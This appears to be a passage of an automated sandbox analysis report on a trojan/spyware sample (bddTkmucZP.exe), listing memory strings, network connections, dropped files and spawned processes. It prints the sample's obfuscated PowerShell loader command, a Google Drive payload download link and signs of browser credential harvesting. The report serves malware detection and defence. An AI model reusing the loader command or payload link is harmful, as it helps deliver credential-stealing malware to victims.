          Source: msiexec.exe, 0000000B.00000002.2133262938.0000000025DA2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2133262938.0000000025B4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: msiexec.exe, 0000000B.00000002.2131404066.0000000024C0E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2131404066.0000000024C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: msiexec.exe, 0000000B.00000002.2131404066.0000000024C0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en(
          Source: powershell.exe, 00000001.00000002.1516044337.00000000064D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000001.00000002.1516044337.00000000064D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000001.00000002.1516044337.00000000064D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: msiexec.exe, 0000000B.00000002.2116644708.0000000008C9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/GS
          Source: msiexec.exe, 0000000B.00000002.2116644708.0000000008C9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/_S
          Source: msiexec.exe, 0000000B.00000002.2129476551.0000000023EC0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2116644708.0000000008C9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1GVXvn_52j7eFi-92nW0n-Wxm1UWtG8b9
          Source: msiexec.exe, 0000000B.00000002.2116644708.0000000008C9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1GVXvn_52j7eFi-92nW0n-Wxm1UWtG8b9QU
          Source: msiexec.exe, 0000000B.00000002.2116644708.0000000008D0F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1745191196.0000000008D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
          Source: msiexec.exe, 0000000B.00000002.2116644708.0000000008CF8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1688467739.0000000008D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1GVXvn_52j7eFi-92nW0n-Wxm1UWtG8b9&export=download
          Source: msiexec.exe, 0000000B.00000002.2133262938.0000000025B4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: msiexec.exe, 0000000B.00000002.2133262938.0000000025DA2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2133262938.0000000025B4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
          Source: msiexec.exe, 0000000B.00000002.2133262938.0000000025B4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: svchost.exe, 00000004.00000003.1203225720.0000022BB70B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
          Source: svchost.exe, 00000004.00000003.1203225720.0000022BB7060000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
          Source: msiexec.exe, 0000000B.00000002.2133262938.0000000025B4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
          Source: powershell.exe, 00000001.00000002.1513466927.00000000055C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1512682110.0000000003578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000001.00000002.1516044337.00000000064D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: msiexec.exe, 0000000B.00000002.2131404066.0000000024B71000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2131404066.0000000024B4B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2131404066.0000000024ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: msiexec.exe, 0000000B.00000002.2131404066.0000000024ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: msiexec.exe, 0000000B.00000002.2131404066.0000000024ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
          Source: msiexec.exe, 0000000B.00000002.2131404066.0000000024B71000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2131404066.0000000024B4B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2131404066.0000000024B05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
          Source: msiexec.exe, 0000000B.00000003.1688467739.0000000008D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
          Source: msiexec.exe, 0000000B.00000002.2133262938.0000000025DA2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2133262938.0000000025B4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
          Source: msiexec.exe, 0000000B.00000003.1688467739.0000000008D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
          Source: msiexec.exe, 0000000B.00000003.1688467739.0000000008D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: msiexec.exe, 0000000B.00000002.2133262938.0000000025DA2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2133262938.0000000025B4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
          Source: msiexec.exe, 0000000B.00000003.1688467739.0000000008D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
          Source: msiexec.exe, 0000000B.00000003.1688467739.0000000008D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: msiexec.exe, 0000000B.00000002.2131404066.0000000024C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: msiexec.exe, 0000000B.00000002.2131404066.0000000024C3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/(
          Source: msiexec.exe, 0000000B.00000002.2131404066.0000000024C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
          Source: msiexec.exe, 0000000B.00000002.2131404066.0000000024C49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
          Source: unknownNetwork traffic detected: HTTP traffic on port 58304 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58293 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58291 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58300
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58302
          Source: unknownNetwork traffic detected: HTTP traffic on port 58309 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58294 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58308
          Source: unknownNetwork traffic detected: HTTP traffic on port 58290 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58309
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58304
          Source: unknownNetwork traffic detected: HTTP traffic on port 58296 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58298 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58306
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58296
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58298
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58291
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58294
          Source: unknownNetwork traffic detected: HTTP traffic on port 58308 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58293
          Source: unknownNetwork traffic detected: HTTP traffic on port 58306 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58290
          Source: unknownNetwork traffic detected: HTTP traffic on port 58300 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58302 -> 443
          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:58290 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.217.23.97:443 -> 192.168.2.7:58291 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:58309 version: TLS 1.2
          Source: C:\Users\user\Desktop\bddTkmucZP.exeCode function: 0_2_00405582 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405582

          System Summary

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Rediscovery\bddTkmucZP.exeJump to dropped file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\user\Desktop\bddTkmucZP.exeCode function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040348F
          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeCode function: 0_2_00406AFA0_2_00406AFA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_029DD27911_2_029DD279
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_029D533111_2_029D5331
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_029DC1A711_2_029DC1A7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_029DC73811_2_029DC738
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_029DC47711_2_029DC477
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_029DCA0811_2_029DCA08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_029DE98811_2_029DE988
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_029D3E0911_2_029D3E09
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_029DCFAF11_2_029DCFAF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_029DCCDC11_2_029DCCDC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_029D539011_2_029D5390
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_029D69A011_2_029D69A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_029D29EC11_2_029D29EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_029DE97B11_2_029DE97B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_029DF96111_2_029DF961
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_029D6FC811_2_029D6FC8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_029D9DE011_2_029D9DE0
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsg2A1D.tmp\nsExec.dll 5E66489393F159AA0FD30B630BB345D03418E9324E7D834B2E4195865A637CFE
          Source: bddTkmucZP.exeStatic PE information: invalid certificate
          Source: bddTkmucZP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/34@6/6
          Source: C:\Users\user\Desktop\bddTkmucZP.exeCode function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040348F
          Source: C:\Users\user\Desktop\bddTkmucZP.exeCode function: 0_2_00404822 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404822
          Source: C:\Users\user\Desktop\bddTkmucZP.exeCode function: 0_2_004021A2 CoCreateInstance,0_2_004021A2
          Source: C:\Users\user\Desktop\bddTkmucZP.exeFile created: C:\Users\user\Pictures\downtreadingJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6112:120:WilError_03
          Source: C:\Users\user\Desktop\bddTkmucZP.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsg1CCE.tmpJump to behavior
          Source: bddTkmucZP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Users\user\Desktop\bddTkmucZP.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: msiexec.exe, 0000000B.00000002.2131404066.0000000024D01000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2131404066.0000000024D32000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2131404066.0000000024CF2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2131404066.0000000024CE3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: bddTkmucZP.exeVirustotal: Detection: 74%
          Source: bddTkmucZP.exeReversingLabs: Detection: 52%
          Source: C:\Users\user\Desktop\bddTkmucZP.exeFile read: C:\Users\user\Desktop\bddTkmucZP.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\bddTkmucZP.exe "C:\Users\user\Desktop\bddTkmucZP.exe"
          Source: C:\Users\user\Desktop\bddTkmucZP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Kabelforbindelsernes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Frontalangreb.Kon237';$Preaccommodating=$Kabelforbindelsernes.SubString(11763,3);.$Preaccommodating($Kabelforbindelsernes)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
          Source: C:\Users\user\Desktop\bddTkmucZP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Kabelforbindelsernes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Frontalangreb.Kon237';$Preaccommodating=$Kabelforbindelsernes.SubString(11763,3);.$Preaccommodating($Kabelforbindelsernes)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
